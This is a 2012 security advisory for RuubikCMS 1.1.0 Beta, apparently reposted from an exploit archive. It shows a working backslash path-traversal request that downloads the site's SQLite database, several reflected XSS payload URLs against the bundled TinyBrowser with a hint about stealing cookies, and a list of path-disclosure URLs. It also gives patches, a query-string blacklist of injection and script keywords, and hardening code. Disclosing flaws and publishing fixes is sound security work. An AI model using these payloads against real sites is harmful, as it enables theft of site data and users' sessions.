RuubikCMS 1.1.0 Beta XSS / Disclosure / Directory Traversal

23 May 2012 00:00:00. Reported by AkaStep. Source: 0day.today

RuubikCMS 1.1.0 Beta Vulnerable to Traversal, XSS, Disclosure

=========================================================
Vulnerable software: RuubikCMS Version 1.1.0 Beta
Official site: http://www.ruubikcms.com/
Downloaded from: http://www.ruubikcms.com/ruubikcms/download.php?f=ruubikcms111.zip
=========================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
MySQL: 5.5.24
=========================================================

Vuln Desc:
RuubikCMS Version 1.1.0 Beta is prone to Traversal, XSS,
Info and Path Disclosures.
=========================================================

1) Traversal vuln:
//ruubikcms/extra/image.php
Vulnerable code section:
(To exploit this vuln you need to be authenticated against the application)
*This vuln can be exploited by users to escalate privileges to admin on Windows OS*
==============SNIP==================
<?php
// --- Image displayer with authentication
// --- Sample call: image.php?f=imgfile.jpg
// --- Sample call with subfolder: image.php?f=subfolder/imgfile.jpg

require('../ruubikcms/includes/dbconfig.php');
$dbh = new PDO(PDO_DB_DRIVER.':../'.RUUBIKCMS_FOLDER.'/'.PDO_DB_FOLDER.'/'.PDO_DB_NAME); // database connection object
require('../ruubikcms/includes/commonfunc.php');
define('LOGOUT_TIME', query_single("SELECT logout_time FROM options WHERE id = 1"));
require('login/session.php');

// check if logged in
if (!@$_SESSION['uid']) die("Access denied.");

// images directory
define('BASE_DIR','useruploads/images/');

// make sure program execution doesn't time out
@set_time_limit(0);

if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
if (strstr($_GET['f'], '../')) die('Error');
$fpath = BASE_DIR.$_GET['f'];
if (!is_file($fpath)) die("File does not exist.");

// file size in bytes
// $fsize = filesize($fpath);

// get mime type
$mtype = '';

if (function_exists('mime_content_type')) {
  $mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
  $finfo = finfo_open(FILEINFO_MIME); // return mime type
  $mtype = finfo_file($finfo, $fpath);
  finfo_close($finfo);
}

if ($mtype == '') {
  $mtype = "image/jpeg";
}

header("Content-type: $mtype");
readfile($fpath);
?>
=====================================


Line 22 only rejects "../", so on Windows OS the path can still be traversed with backslashes.
Exploit:

GET /learn/ruubikcms/extra/image.php?f=..\..\..\ruubikcms\sqlite\ruubikcms.sqlite HTTP/1.1
Host: 192.168.0.15
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: cmslogin=1vbnblnfsb367lgoovsr1qdo2b9c2hav

=============================*RAW response body:*=============================


HTTP/1.1 200 OK
Date: Tue, 22 May 2012 12:01:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: image/jpeg

SQLite format 3 [binary header bytes omitted]
CREATE TABLE "page" ("pageurl" text PRIMARY KEY ,"name" text,"title" text,"header1" text,"description" text,
"keywords" text,"content" text,"mother" text,"levelnum" integer,"ordernum" integer,"image1" text,"image2" text,
"lang" text,"pagetype" integer,"extracode" text,"status" integer, "updater" TEXT, "updated" TEXT, "creator" TEXT)'
CREATE TABLE "site" ("id" integer PRIMARY KEY ,"name" text,"doctype" integer,"charset" text,"robots" text,
"title" text,"description" text,"keywords" text,"copyright" text,"author" text,"lang" text,"gacode" text,
"news_textlink" INTEGER,"news_readmore" INTEGER,"news_showdate" INTEGER,"news_maxshort" INTEGER, "no_image1"
INTEGER, "no_image2" INTEGER, "clean_url" INTEGER, "url_suffix" TEXT, "news_num" INTEGER, "siteroot" TEXT,
====================================EOF SNIP=====================================

Use Fiddler to intercept the RAW body of the response.




How to fix?:
Open //ruubikcms/extra/image.php
Change lines 22 and 23 to this:

//============BEGIN===========
// Turn backslashes into forward slashes before the check so "..\" is caught as well
// as "../" (stripping them would leave "...." which the check never matches),
// and build the path from the normalised value.
$f = str_replace('\\', '/', $_GET['f']);
if (strstr($f, '../')) die('Error');
$fpath = BASE_DIR.$f;
//============END=============
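A more complete hardening of the same check, added here as an example and not code from RuubikCMS or its author: normalise both separators, reject every dot segment, canonicalise with realpath() and require the result to stay under BASE_DIR, then serve only files whose detected type is an image. It assumes PHP 5.3 or later with the fileinfo extension; safe_image_path() is a hypothetical helper name, and the original script's session check and database setup are unchanged and not repeated here.

```php
<?php
// Added example, not RuubikCMS code: serve an image only when the canonical
// path stays inside BASE_DIR. Catches both "../" and the Windows "..\" bypass.
define('BASE_DIR', 'useruploads/images/');

// Return the canonical file path to serve, or null when the request is unsafe
// (hypothetical helper; $base_dir must be an existing directory).
function safe_image_path($requested, $base_dir)
{
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Refuse control characters (NUL truncation) and absolute or drive-letter paths.
    if (preg_match('/[\x00-\x1f]/', $requested) || preg_match('#^([A-Za-z]:|[\\\\/])#', $requested)) {
        return null;
    }
    // Treat backslash as a separator too, then reject empty and dot segments outright.
    $normalised = str_replace('\\', '/', $requested);
    foreach (explode('/', $normalised) as $segment) {
        if ($segment === '' || $segment === '.' || $segment === '..') {
            return null;
        }
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . str_replace('/', DIRECTORY_SEPARATOR, $normalised));
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Containment check on canonical paths, so a symlink inside BASE_DIR cannot escape either.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

$fpath = isset($_GET['f']) ? safe_image_path($_GET['f'], BASE_DIR) : null;
if ($fpath === null) {
    header('HTTP/1.1 404 Not Found');
    die('File does not exist.');
}
// Only image types leave this script; a SQLite database or PHP source is refused
// instead of being labelled image/jpeg as the original fallback did.
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mtype = finfo_file($finfo, $fpath);
finfo_close($finfo);
if ($mtype === false || strpos($mtype, 'image/') !== 0) {
    header('HTTP/1.1 403 Forbidden');
    die('Not an image.');
}
header('Content-Type: ' . $mtype);
readfile($fpath);
```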





2) Due to several XSS vulns in the third-party application TinyBrowser 1.41
(TinyBrowser 1.41 - A TinyMCE file browser (C) 2008 Bryn Jones,
author website - http://www.lunarvis.com),
RuubikCMS is also vulnerable to XSS.
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/folders.php?type=image&folder=&feid="/>a<script>alert(1);</script>

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&feid="</a><script>alert(1);</script>
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image"</a><script>alert(1);</script>&folder=&feid=owned
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/upload.php?feid="</a><script>alert("AkaStep");</script>

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=&find="><script>alert("AkaStep");</script>


HINT: charcode it if you want to steal cookies.


For @admins, @users, @webmasters:
To prevent XSS vulns in this case see below (remember this is not an ideal solution, it is only a *workaround*):
Save all this stuff as antikiddie.php and upload it to:

/ruubikcms/tiny_mce/plugins/tinybrowser/

Then open config_tinybrowser.php and include your antikiddie.php
in config_tinybrowser.php.


===================BEGIN==============
<?php
error_reporting(0); // error_reporting() takes an integer; the string 'off' is not a valid argument

/*
 //antikiddie.php
 include it in your /ruubikcms/tiny_mce/plugins/tinybrowser/config_tinybrowser.php
 (at the bottom, after <?php
 )
 like this:
 include 'antikiddie.php';

 ANOTHER NOTE:
  More patterns could be added here, but that may break the
  application's API, so a lot of patterns were removed from this list.
 */

// Blacklist of substrings that must not appear in the decoded query string.
// Escape sequences need double quotes to become the control characters they name.
$commonpatterns=array("$","/*","*","union",'"','\'',
"0x",
"where","concat","concat_ws","group_concat",
"information_schema","tables","columns",
"hex","table_name","column_name","distinct",
"/*!","*/","into","load_file",'(',')',
"outfile","truncate","drop",
"delete",";","+","substr","update",
"\x00","\n","\r","\\","\x1a",
"schemata","mysql","convert","using","char","`","|",
"from",
"table","dumpfile","php",
'<','>','<script>','base64','alert','</script>','%0d%0a',
'document.write',',','String.fromCharCode','..','document.cookie','cookie','eval','href','document.location','location.replace','window',
'onmouse','onblur','onfocus','onerror','limit','javascript');

// Abort the request as soon as any pattern is found (case-insensitive match).
foreach($commonpatterns as $myvals)
{
    if(stristr(urldecode($_SERVER['QUERY_STRING']),$myvals))
    {
        die('<script>alert("No Scriptkidding! :)");</script>'. PHP_EOL .
            '<h1>Can\'t Proceed your request! It is malicious.</h1>');
    }
}
unset($myvals);
?>



==================END=================
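Blacklisting query strings is fragile (the list above also blocks legitimate words such as "where", "window" and "php"), so the durable fix for the reflected parameters named in the URLs above (type, folder, feid, find) is to validate them against what TinyBrowser actually accepts and HTML-encode them where they are written into the page. The following is an added example, not TinyBrowser's or RuubikCMS's code; the tb_* function names and the set of allowed type values are assumptions, and it expects PHP 7 or later.

```php
<?php
// Added example, not TinyBrowser's code: validate the parameters TinyBrowser
// reflects (type, folder, feid, find) and HTML-encode them at the output sink.
// Function names are hypothetical; assumes PHP 7 or later.

// feid is a TinyMCE form-element id: identifier characters only, otherwise empty.
function tb_clean_feid($feid)
{
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $feid) ? $feid : '';
}

// type is an enumeration (assumed values); unknown input falls back to the default.
function tb_clean_type($type)
{
    return in_array($type, ['image', 'media', 'file'], true) ? $type : 'image';
}

// folder is a relative sub-folder: normalise separators, forbid dot and empty segments.
function tb_clean_folder($folder)
{
    $folder = trim(str_replace('\\', '/', $folder), '/');
    if ($folder === '') {
        return '';
    }
    foreach (explode('/', $folder) as $seg) {
        if ($seg === '.' || $seg === '..' || !preg_match('/^[A-Za-z0-9_.-]+$/', $seg)) {
            return '';
        }
    }
    return $folder;
}

// Encode for HTML text and attributes. The default flags already encode the double
// quote that the "</a><script> payloads in the advisory use to break out of an
// attribute; ENT_QUOTES extends that to single-quoted attributes.
function tb_h($s)
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed input: the advisory's payloads stand in for $_GET when run from the CLI.
$feid   = tb_clean_feid($_GET['feid']     ?? '"</a><script>alert(1);</script>');
$type   = tb_clean_type($_GET['type']     ?? 'image"</a><script>alert(1);</script>');
$folder = tb_clean_folder($_GET['folder'] ?? '..\\..\\etc');
$find   = $_GET['find'] ?? '"><script>alert("AkaStep");</script>';

// feid and type are now known-safe, but encode at the sink anyway; find is free text
// and is only ever emitted encoded (tb_h) or URL-encoded (rawurlencode).
echo '<input type="hidden" name="feid" value="' . tb_h($feid) . '">' . PHP_EOL;
echo '<a href="edit.php?type=' . rawurlencode($type) . '&amp;folder=' . rawurlencode($folder)
   . '&amp;find=' . rawurlencode($find) . '">' . tb_h($find) . '</a>' . PHP_EOL;
```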


3) Info disclosure (the error log reveals information about the system):
http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/error.log


4) Path disclosure:
http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php


Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
 NEWS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31



http://192.168.0.15/learn/ruubikcms/extra/login/session.php



Notice: Use of undefined constant LOGOUT_TIME - assumed 'LOGOUT_TIME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\extra\login\session.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/dbconnection.php


Notice: Use of undefined constant PDO_DB_DRIVER - assumed 'PDO_DB_DRIVER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3

Notice: Use of undefined constant PDO_DB_FOLDER - assumed 'PDO_DB_FOLDER' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3

Notice: Use of undefined constant PDO_DB_NAME - assumed 'PDO_DB_NAME' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\dbconnection.php on line 3
could not find driver


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/extrapagemenu.php


Notice: Use of undefined constant EXTRAPAGES - assumed 'EXTRAPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 4
EXTRAPAGES



Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\extrapagemenu.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/footer.php

Notice: Use of undefined constant VERSION - assumed 'VERSION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant VERNUM - assumed 'VERNUM' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
VERSION VERNUM
Notice: Use of undefined constant THANKYOUTEXT - assumed 'THANKYOUTEXT' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant DOCUMENTATION - assumed 'DOCUMENTATION' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5

Notice: Use of undefined constant FEEDBACK - assumed 'FEEDBACK' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\footer.php on line 5
THANKYOUTEXT RuubikCMS | DOCUMENTATION | FEEDBACK



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/head.php
See title of page.


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/mainmenu.php
A lot of notices.


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/multilang.php



Notice: Undefined variable: multilang_links in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2

Warning: Invalid argument supplied for foreach() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\multilang.php on line 2



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/newsmenu.php


Notice: Use of undefined constant NEWS - assumed 'NEWS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 4
NEWS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\newsmenu.php on line 31



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/pagemenu.php


Notice: Use of undefined constant WEBPAGES - assumed 'WEBPAGES' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 4
WEBPAGES



Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\pagemenu.php on line 17


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/required.php


Warning: require(../includes/dbconfig.php) [function.require]: failed to open stream: No such file or directory in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4

Fatal error: require() [function.require]: Failed opening required '../includes/dbconfig.php' (include_path='.;C:\php5\pear') in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\required.php on line 4


http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/snippetmenu.php

Notice: Use of undefined constant SNIPPETS - assumed 'SNIPPETS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 4
SNIPPETS
TinyMCE

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\snippetmenu.php on line 17



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/includes/usersmenu.php

Notice: Use of undefined constant USERS - assumed 'USERS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 4
USERS

Notice: Use of undefined constant ADMINISTRATORS - assumed 'ADMINISTRATORS' in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 15
ADMINISTRATORS

Notice: Undefined variable: dbh in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21

Fatal error: Call to a member function query() on a non-object in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\ruubikcms\ruubikcms\cms\includes\usersmenu.php on line 21



http://192.168.0.15/learn/ruubikcms/ruubikcms/cms/login/form.php


http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/filelink/filelink.php



http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_standalone.js.php

function tinyBrowserPopUp(type, formelementid, folder) {
  tburl = "/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tinybrowser.php" + "?type=" + type + "&feid=" + formelementid;
  if (folder !== undefined) tburl += "&folder=" + folder + "%2F";
  newwindow = window.open(tburl, 'tinybrowser', 'height=495,width=785,scrollbars=yes,resizable=yes');
  if (window.focus) { newwindow.focus() }
  return false;
}

http://192.168.0.15/learn/ruubikcms/ruubikcms/tiny_mce/plugins/tinybrowser/tb_tinymce.js.php
Contains full path to application in plaintext.

http://192.168.0.15/learn/ruubikcms/ruubikcms/website/scripts/jquery.lightbox-0.5.js.php
Direct plaintext output.




Workaround about info disclosures:

Open ruubikcms\tiny_mce\plugins\tinybrowser\fns_tinybrowser.php

Change line 423 to this:
=========BEGIN========
//error_log($err, 3, 'error.log');
=========END==========


or you can try:


=========BEGIN========
error_log($err, 3, 'error_log');
=========END==========

Do not forget to remove your old error.log.



Workaround about path disclosures:
Open your main .htaccess file (if it doesn't exist, create a new one at public_html/.htaccess)
and copy/paste this:

==========BEGIN======

php_value error_reporting off




==========END========

This will disable all error reporting when any error, warning or notice occurs. Note that setting error_reporting to 0 also stops errors from being written to the log; `php_flag display_errors off` hides them from visitors while keeping them in the server log.



Vendor notified about vulns.




++++As always My Special Thanks to:++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securityvulns.com &&
to all AA Team
++++++++++++++++++++++++++++++++++++++++
Thank you.

/AkaStep ^_^



#  0day.today [2018-03-02]  #
